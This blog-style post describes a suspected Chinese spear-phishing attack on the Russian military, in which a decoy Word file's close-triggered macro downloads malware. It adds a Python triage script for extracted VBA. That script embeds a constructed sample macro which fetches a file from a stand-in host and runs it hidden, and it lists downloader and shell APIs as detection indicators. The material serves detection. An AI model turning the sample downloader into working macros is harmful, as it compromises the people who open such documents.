Even though Russia has highly advanced cyber attack capabilities, this does not mean they are immune to operations designed to breach their networks. It would seem China may have conducted a cyber attack against the Russian military:
“There is a world market for classified data of any time,” said Epstein. “There are documented cases in the past where private hackers hacked into various institutions and then sold the data to nation states. The lines are increasingly blurred in the world of cybersecurity.”
The attack starts with a well-written Russian-language email that appears to come from someone else in the targeted military division, or from an analyst section within the same branch of the military, he said.
It comes with an attached document, a Microsoft Word file with a published article about the history of military testing in Russia.
“It’s a decoy document,” said Epstein. “You double-click on it, you open it, you read it, you think, ‘Ah, that was kind of interesting.’ Then you close it and you don’t think about it again. But when it closes, it activates a macro, and the macro triggers a secondary file to take action, which is to download a third file, which is the nasty stuff.”
That is when the malware takes over the computer: everything the user has access to, the attackers now have access to as well.
“Any anti-virus program wouldn’t see a virus in the document because there’s no virus in the document,” he said. “And the trigger on closing is a common anti-sandboxing technique because most sandboxes check for triggering when documents are opened, not when they are closed.”
This is a fairly standard, yet highly advanced, technique for evading endpoint anti-virus. It is why layered defenses must extend beyond the network and be implemented at the endpoint level too. Tools like application whitelisting, host intrusion prevention, and desktop firewalls, when used together, can greatly reduce the chance that this type of malware executes successfully.
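The close-on-trigger evasion Epstein describes can be caught before a sandbox ever runs the document, by triaging the extracted macro source for its entry point and its capabilities. The following is an added example written for this post, not code from the article or from any vendor; it assumes the VBA source has already been pulled out of the file (for instance with olevba) and uses two constructed macro samples rather than the real decoy document's code.

```python
import re
from dataclasses import dataclass, field

# Word/Excel VBA entry points that run without a user clicking anything. The
# macro in the article fires on *close*; a sandbox that only opens the
# document never exercises that path, which is the evasion described above.
OPEN_TRIGGERS = {"autoopen", "document_open", "autoexec", "auto_open", "workbook_open"}
CLOSE_TRIGGERS = {"autoclose", "document_close", "auto_close", "autoexit", "workbook_beforeclose"}
# API names typical of a fetch-then-run second stage (indicators, not proof).
DOWNLOAD_APIS = ("URLDownloadToFile", "MSXML2.XMLHTTP", "WinHttp.WinHttpRequest", "InternetOpenUrl")
EXEC_APIS = ("Shell", "WScript.Shell", "ShellExecute", "CreateProcess")

PROC_RE = re.compile(r"^\s*(?:Private\s+|Public\s+)?(?:Sub|Function)\s+(\w+)", re.I | re.M)


@dataclass
class MacroVerdict:
    open_triggers: list = field(default_factory=list)
    close_triggers: list = field(default_factory=list)
    download_apis: list = field(default_factory=list)
    exec_apis: list = field(default_factory=list)

    @property
    def suspicious(self) -> bool:
        # an auto-exec entry point combined with download-or-execute capability
        return bool(self.open_triggers or self.close_triggers) and bool(self.download_apis or self.exec_apis)

    @property
    def close_only(self) -> bool:
        # fires only on close: exactly the case an open-only sandbox run would miss
        return bool(self.close_triggers) and not self.open_triggers


def triage_vba(src: str) -> MacroVerdict:
    """Classify extracted VBA source by auto-exec trigger and capability indicators."""
    v = MacroVerdict()
    for name in PROC_RE.findall(src):
        if name.lower() in OPEN_TRIGGERS:
            v.open_triggers.append(name)
        elif name.lower() in CLOSE_TRIGGERS:
            v.close_triggers.append(name)
    v.download_apis = [a for a in DOWNLOAD_APIS if re.search(r"\b" + re.escape(a) + r"\b", src, re.I)]
    v.exec_apis = [a for a in EXEC_APIS if re.search(r"\b" + re.escape(a) + r"\b", src, re.I)]
    return v


# Constructed samples (not the real document's macros): one mimics the
# close-triggered downloader described above, the other is a benign open handler.
DECOY_STYLE_MACRO = """\
Sub AutoClose()
    Dim p As String: p = Environ("TEMP") & "\\s2.exe"
    URLDownloadToFile 0, "http://example.invalid/s2", p, 0, 0
    Shell p, vbHide
End Sub
"""
BENIGN_MACRO = """\
Private Sub Document_Open()
    MsgBox "Draft: do not distribute"
End Sub
"""

if __name__ == "__main__":
    for label, src in (("decoy", DECOY_STYLE_MACRO), ("benign", BENIGN_MACRO)):
        v = triage_vba(src)
        print(label, "suspicious=%s close_only=%s %s" % (v.suspicious, v.close_only, v))
```

A `close_only` verdict is the signal to detonate the sample with an explicit close step, or to block it outright under an application-whitelisting policy that does not permit macros to spawn processes.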
Who here wonders if this attack was actually perpetrated by the United States but made to appear as if China is responsible?